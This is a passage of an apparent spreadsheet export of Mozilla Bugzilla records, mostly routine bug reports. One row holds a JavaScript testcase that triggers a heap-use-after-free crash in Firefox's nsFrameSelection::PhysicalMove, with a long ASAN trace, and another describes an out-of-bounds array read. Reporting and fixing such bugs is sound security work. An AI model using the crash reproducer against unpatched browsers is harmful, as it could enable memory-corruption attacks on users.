        </is>
      </c>
      <c r="L3271" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3271" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3271" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3271" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3271" t="inlineStr">
        <is>
          <t>[adv-main31+]</t>
        </is>
      </c>
      <c r="Q3271" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3271" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3271" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T3271" t="n">
        <v>1</v>
      </c>
      <c r="U3271" t="n">
        <v>0</v>
      </c>
      <c r="V3271" t="n">
        <v>12</v>
      </c>
      <c r="W3271" t="inlineStr">
        <is>
          <t>Here is code from gfxPlatform::GetPrefLangName:
    if (uint32_t(aLang) &lt; uint32_t(eFontPrefLang_AllCount))
        return gPrefLangNames[uint32_t(aLang)];
eFontPrefLang_AllCount is 32, whereas gPrefLangNames has 31 entries in it.  Thus if you pass in 31, you'll end up reading past the end of gPrefLangNames.  Maybe the check should be against eFontPrefLang_LangCount (which is 30) instead of eFontPrefLang_AllCount?  Presumably a static assert could catch problems here in the future.
At first I thought this was a regression from bug 213517, but it looks like that _removed_ an entry from eFontPrefLang, so I think it made it slightly better.  I did a bit of digging, but I'm not sure when this was introduced.  Coverity first noticed this in December 2012.</t>
        </is>
      </c>
      <c r="X3271" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3272">
      <c r="A3272" t="n">
        <v>1744120</v>
      </c>
      <c r="B3272" t="inlineStr">
        <is>
          <t>2021-12-02 12:01:16 -0800</t>
        </is>
      </c>
      <c r="C3272" t="inlineStr">
        <is>
          <t>delete crash report data for SeaMonkey [end of January 2022]</t>
        </is>
      </c>
      <c r="D3272" t="inlineStr">
        <is>
          <t>2022-05-13 08:10:06 -0700</t>
        </is>
      </c>
      <c r="E3272" t="n">
        <v>1</v>
      </c>
      <c r="F3272" t="n">
        <v>1</v>
      </c>
      <c r="G3272" t="n">
        <v>4</v>
      </c>
      <c r="H3272" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3272" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3272" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3272" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3272" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3272" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3272" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3272" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3272" t="inlineStr"/>
      <c r="Q3272" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3272" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3272" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3272" t="n">
        <v>1</v>
      </c>
      <c r="U3272" t="n">
        <v>0</v>
      </c>
      <c r="V3272" t="n">
        <v>12</v>
      </c>
      <c r="W3272" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1608976 +++
This is a followup bug for deleting crash report data for SeaMonkey from our data stores. Per the timeline, we should do this at the end of January 2022.
https://bugzilla.mozilla.org/show_bug.cgi?id=1608976#c16
At the end of January 2022 (or thereabouts), we'll do something along these lines:
1. remove SeaMonkey product_details file and other places in the webapp
2. build a list of crash ids for SeaMonkey crash reports
3. delete SeaMonkey crash report data from S3
4. delete SeaMonkey crash report data from Elasticsearch</t>
        </is>
      </c>
      <c r="X3272" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3273">
      <c r="A3273" t="n">
        <v>964144</v>
      </c>
      <c r="B3273" t="inlineStr">
        <is>
          <t>2014-01-26 21:10:17 -0800</t>
        </is>
      </c>
      <c r="C3273" t="inlineStr">
        <is>
          <t>Thunderbird 27.0b1 for Windows is not downloadable</t>
        </is>
      </c>
      <c r="D3273" t="inlineStr">
        <is>
          <t>2014-01-27 00:34:31 -0800</t>
        </is>
      </c>
      <c r="E3273" t="n">
        <v>1</v>
      </c>
      <c r="F3273" t="n">
        <v>1</v>
      </c>
      <c r="G3273" t="n">
        <v>5</v>
      </c>
      <c r="H3273" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3273" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3273" t="inlineStr">
        <is>
          <t>Release Requests</t>
        </is>
      </c>
      <c r="K3273" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3273" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3273" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3273" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3273" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3273" t="inlineStr"/>
      <c r="Q3273" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3273" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3273" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3273" t="n">
        <v>1</v>
      </c>
      <c r="U3273" t="n">
        <v>0</v>
      </c>
      <c r="V3273" t="n">
        <v>2</v>
      </c>
      <c r="W3273" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:28.0) Gecko/20100101 Firefox/28.0 (Beta/Release)
Build ID: 20140121004017
Steps to reproduce:
I tried to download Thunderbird 27.0b1 for Windows from http://www.mozilla.org/en-US/thunderbird/all-beta.html. 
Actual results:
I can not download it. The server respond 404 page.
Expected results:
We can download Thunderbird 27.0b1 from http://www.mozilla.org/en-US/thunderbird/all-beta.html.</t>
        </is>
      </c>
      <c r="X3273" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3274">
      <c r="A3274" t="n">
        <v>841766</v>
      </c>
      <c r="B3274" t="inlineStr">
        <is>
          <t>2013-02-15 08:18:19 -0800</t>
        </is>
      </c>
      <c r="C3274" t="inlineStr">
        <is>
          <t>We should warn users when magical require is used</t>
        </is>
      </c>
      <c r="D3274" t="inlineStr">
        <is>
          <t>2013-06-12 13:23:50 -0700</t>
        </is>
      </c>
      <c r="E3274" t="n">
        <v>1</v>
      </c>
      <c r="F3274" t="n">
        <v>1</v>
      </c>
      <c r="G3274" t="n">
        <v>6</v>
      </c>
      <c r="H3274" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3274" t="inlineStr">
        <is>
          <t>Add-on SDK Graveyard</t>
        </is>
      </c>
      <c r="J3274" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3274" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3274" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3274" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3274" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3274" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3274" t="inlineStr"/>
      <c r="Q3274" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3274" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3274" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3274" t="n">
        <v>1</v>
      </c>
      <c r="U3274" t="n">
        <v>0</v>
      </c>
      <c r="V3274" t="n">
        <v>10</v>
      </c>
      <c r="W3274" t="inlineStr">
        <is>
          <t>We have created https://github.com/mozilla/addon-sdk/blob/master/mapping.json to allow backwards compatible require statements to old add-ons. But the problem is that we end up using deprecated patterns ourselfs and likely add-ons do it too.
CFX should log deprecation warning whenever forms from mapping are normalized and suggest use of normalized form instead.</t>
        </is>
      </c>
      <c r="X3274" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3275">
      <c r="A3275" t="n">
        <v>19051</v>
      </c>
      <c r="B3275" t="inlineStr">
        <is>
          <t>1999-11-17 09:25:22 -0800</t>
        </is>
      </c>
      <c r="C3275" t="inlineStr">
        <is>
          <t>{ib} extremely slow layout of page with many inline tags (&lt;PRE&gt; involved?)</t>
        </is>
      </c>
      <c r="D3275" t="inlineStr">
        <is>
          <t>2001-01-03 12:56:00 -0800</t>
        </is>
      </c>
      <c r="E3275" t="n">
        <v>1</v>
      </c>
      <c r="F3275" t="n">
        <v>1</v>
      </c>
      <c r="G3275" t="n">
        <v>3</v>
      </c>
      <c r="H3275" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3275" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3275" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K3275" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3275" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3275" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3275" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3275" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3275" t="inlineStr">
        <is>
          <t>[HAVE FIX]</t>
        </is>
      </c>
      <c r="Q3275" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3275" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3275" t="inlineStr">
        <is>
          <t>M18</t>
        </is>
      </c>
      <c r="T3275" t="n">
        <v>1</v>
      </c>
      <c r="U3275" t="n">
        <v>0</v>
      </c>
      <c r="V3275" t="n">
        <v>41</v>
      </c>
      <c r="W3275" t="inlineStr">
        <is>
          <t>I'm using Milestone 11 on a standard Redhat Linux 6.1 box, and viewing an image
that has been turned into a graphic such as the url provided, mozilla goes
extremely slow and becomes unresponsive for a long time.  This is in contrast to
netscape communicator or IE, which render and scroll with such an image
(text-image) rather quickly.
Thanks.</t>
        </is>
      </c>
      <c r="X3275" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3276">
      <c r="A3276" t="n">
        <v>1343642</v>
      </c>
      <c r="B3276" t="inlineStr">
        <is>
          <t>2017-03-01 12:47:07 -0800</t>
        </is>
      </c>
      <c r="C3276" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsFrameSelection::PhysicalMove</t>
        </is>
      </c>
      <c r="D3276" t="inlineStr">
        <is>
          <t>2024-05-30 09:29:48 -0700</t>
        </is>
      </c>
      <c r="E3276" t="n">
        <v>1</v>
      </c>
      <c r="F3276" t="n">
        <v>1</v>
      </c>
      <c r="G3276" t="n">
        <v>3</v>
      </c>
      <c r="H3276" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3276" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3276" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K3276" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3276" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3276" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3276" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3276" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3276" t="inlineStr">
        <is>
          <t>[adv-main53+][adv-esr45.9+][adv-esr52.1+]</t>
        </is>
      </c>
      <c r="Q3276" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3276" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3276" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T3276" t="n">
        <v>1</v>
      </c>
      <c r="U3276" t="n">
        <v>0</v>
      </c>
      <c r="V3276" t="n">
        <v>44</v>
      </c>
      <c r="W3276" t="inlineStr">
        <is>
          <t>The following testcases crashes the latest ASAN build of Firefox. The testcase requires the fuzzPriv extension.
&lt;script&gt;
function start() {      
        o0=document.createElement('iframe');
        document.body.appendChild(o0);
        setTimeout(fun1, 400);
}
function fun1() {
        o11=o0.contentDocument.documentElement;
        o20=document.createElement('textarea');
        o11.appendChild(o20);
        o20.focus();
        o0.contentWindow.onresize=fun2;
        o0.width='12px';
        fuzzPriv.trustedKeyEvent(document.documentElement,'press',false,false,true,false,38,0);
}
function fun2() {
        window.top.document.documentElement.appendChild(o0);
        window.fuzzPriv.CC();
        window.fuzzPriv.CC();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==27885==ERROR: AddressSanitizer: heap-use-after-free on address 0x61100030a6b8 at pc 0x7f5ea6a40572 bp 0x7ffec9152090 sp 0x7ffec9152088
READ of size 8 at 0x61100030a6b8 thread T0 (Web Content)
    #0 0x7f5ea6a40571 in nsFrameSelection::PhysicalMove(short, short, bool) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:2224:8
    #1 0x7f5ea5ffe950 in mozilla::SelectionMoveCommands::DoCommand(char const*, nsISupports*) /home/worker/workspace/build/src/editor/libeditor/EditorCommands.cpp:906:14
    #2 0x7f5ea4352016 in nsControllerCommandTable::DoCommand(char const*, nsISupports*) /home/worker/workspace/build/src/dom/commandhandler/nsControllerCommandTable.cpp:147:10
    #3 0x7f5ea43489da in nsBaseCommandController::DoCommand(char const*) /home/worker/workspace/build/src/dom/commandhandler/nsBaseCommandController.cpp:136:10
    #4 0x7f5ea5a387f8 in nsXBLPrototypeHandler::DispatchXBLCommand(mozilla::dom::EventTarget*, nsIDOMEvent*) /home/worker/workspace/build/src/dom/xbl/nsXBLPrototypeHandler.cpp:498:5
    #5 0x7f5ea5a0f40f in nsXBLPrototypeHandler::ExecuteHandler(mozilla::dom::EventTarget*, nsIDOMEvent*) /home/worker/workspace/build/src/dom/xbl/nsXBLPrototypeHandler.cpp:221:12
    #6 0x7f5ea5a55418 in nsXBLWindowKeyHandler::WalkHandlersAndExecute(nsIDOMKeyEvent*, nsIAtom*, nsXBLPrototypeHandler*, unsigned int, mozilla::dom::IgnoreModifierState const&amp;, bool, bool*) /home/worker/workspace/build/src/dom/xbl/nsXBLWindowKeyHandler.cpp:755:19
    #7 0x7f5ea5a4f9eb in nsXBLWindowKeyHandler::WalkHandlersInternal(nsIDOMKeyEvent*, nsIAtom*, nsXBLPrototypeHandler*, bool, bool*) /home/worker/workspace/build/src/dom/xbl/nsXBLWindowKeyHandler.cpp:618:12
    #8 0x7f5ea5a4f3a7 in nsXBLWindowKeyHandler::WalkHandlers(nsIDOMKeyEvent*, nsIAtom*) /home/worker/workspace/build/src/dom/xbl/nsXBLWindowKeyHandler.cpp:298:3
    #9 0x7f5ea5a53b55 in nsXBLWindowKeyHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/xbl/nsXBLWindowKeyHandler.cpp:477:10
    #10 0x7f5ea44b0c69 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1123:16
    #11 0x7f5ea44b2c10 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1297:20
    #12 0x7f5ea449d72d in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:489:9
    #13 0x7f5ea449db34 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:518:5
    #14 0x7f5ea44a0ca4 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #15 0x7f5ea44a2fe7 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:891:12
    #16 0x7f5ea27a8ca1 in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1331:5
    #17 0x7f5ea44be014 in mozilla::dom::EventTarget::DispatchEvent(mozilla::dom::Event&amp;, mozilla::dom::CallerType, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/events/EventTarget.cpp:73:9
    #18 0x7f5ea3c31a72 in mozilla::dom::EventTargetBinding::dispatchEvent(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::EventTarget*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventTargetBinding.cpp:974:15
    #19 0x7f5ea3c2ea6f in mozilla::dom::EventTargetBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventTargetBinding.cpp:1150:13
    #20 0x7f5ea9b5491f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #21 0x7f5ea9b5491f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #22 0x7f5ea9b3b996 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
    #23 0x7f5ea9b3b996 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2944
    #24 0x7f5ea9b20a7b in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #25 0x7f5ea9b54c36 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #26 0x7f5ea9b55312 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #27 0x7f5eaa5233d3 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2819:12
    #28 0x7f5ea13de6e9 in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
    #29 0x7f5ea9b5491f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #30 0x7f5ea9b5491f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #31 0x7f5ea9b3b996 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
    #32 0x7f5ea9b3b996 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2944
    #33 0x7f5ea9b20a7b in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #34 0x7f5ea9b54c36 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #35 0x7f5ea9b55312 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #36 0x7f5eaa52518c in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2878:12
    #37 0x7f5ea3c83d69 in mozilla::dom::Function::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, nsTArray&lt;JS::Value&gt; const&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/FunctionBinding.cpp:36:8
    #38 0x7f5ea23e96b5 in Call&lt;nsCOMPtr&lt;nsISupports&gt; &gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/FunctionBinding.h:72:12
    #39 0x7f5ea23e96b5 in nsGlobalWindow::RunTimeoutHandler(mozilla::dom::Timeout*, nsIScriptContext*) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:12956
    #40 0x7f5ea25a5310 in mozilla::dom::TimeoutManager::RunTimeout(mozilla::dom::Timeout*) /home/worker/workspace/build/src/dom/base/TimeoutManager.cpp:584:34
    #41 0x7f5ea25a052d in mozilla::dom::(anonymous namespace)::TimerCallback(nsITimer*, void*) /home/worker/workspace/build/src/dom/base/Timeout.cpp:65:3
    #42 0x7f5e9fcb97eb in nsTimerImpl::Fire(int) /home/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:479:7
    #43 0x7f5e9fc8877c in nsTimerEvent::Run() /home/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:297:3
    #44 0x7f5e9fc9a522 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:200:15
    #45 0x7f5e9fc99e5f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:74:7
    #46 0x7f5e9fc77802 in mozilla::ValidatingDispatcher::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/Dispatcher.cpp:257:21
    #47 0x7f5e9fcab452 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #48 0x7f5e9fca7d00 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #49 0x7f5ea0ac66f4 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:124:5
    #50 0x7f5ea0a37a98 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #51 0x7f5ea0a37a98 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #52 0x7f5ea0a37a98 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #53 0x7f5ea5e8b53f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #54 0x7f5ea96e2d97 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:852:12
    #55 0x7f5ea0a37a98 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #56 0x7f5ea0a37a98 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #57 0x7f5ea0a37a98 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #58 0x7f5ea96e287c in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:684:7
    #59 0x4e01b6 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:19
    #60 0x4e01b6 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:287
    #61 0x7f5ebb0b582f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #62 0x41c3d8 in _start (/home/nils/fuzzer3/firefox/firefox+0x41c3d8)
0x61100030a6b8 is located 184 bytes inside of 232-byte region [0x61100030a600,0x61100030a6e8)
freed by thread T0 (Web Content) here:
    #0 0x4b2b2b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7f5e9fb48644 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2664:9
    #2 0x7f5e9fb48236 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2839:3
    #3 0x7f5e9fb4f516 in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3825:3
    #4 0x7f5e9fb4ecf0 in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3650:9
    #5 0x7f5e9fb51a8c in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4143:3
    #6 0x7f5ea27c6f8f in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1451:3
    #7 0x7f5ea231e0fd in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1339:3
    #8 0x7f5e9fcc6971 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:115
    #9 0x7f5ea149f987 in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2010:12
    #10 0x7f5ea149f987 in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1329
    #11 0x7f5ea149f987 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1296
    #12 0x7f5ea14a72fb in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:983:12
    #13 0x7f5ea9b5491f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #14 0x7f5ea9b5491f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #15 0x7f5ea9b3b996 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
    #16 0x7f5ea9b3b996 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2944
    #17 0x7f5ea9b20a7b in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #18 0x7f5ea9b54c36 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #19 0x7f5ea9b55312 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #20 0x7f5eaa5233d3 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2819:12
    #21 0x7f5ea13de6e9 in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
    #22 0x7f5ea9b5491f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #23 0x7f5ea9b5491f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #24 0x7f5ea9b3b996 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
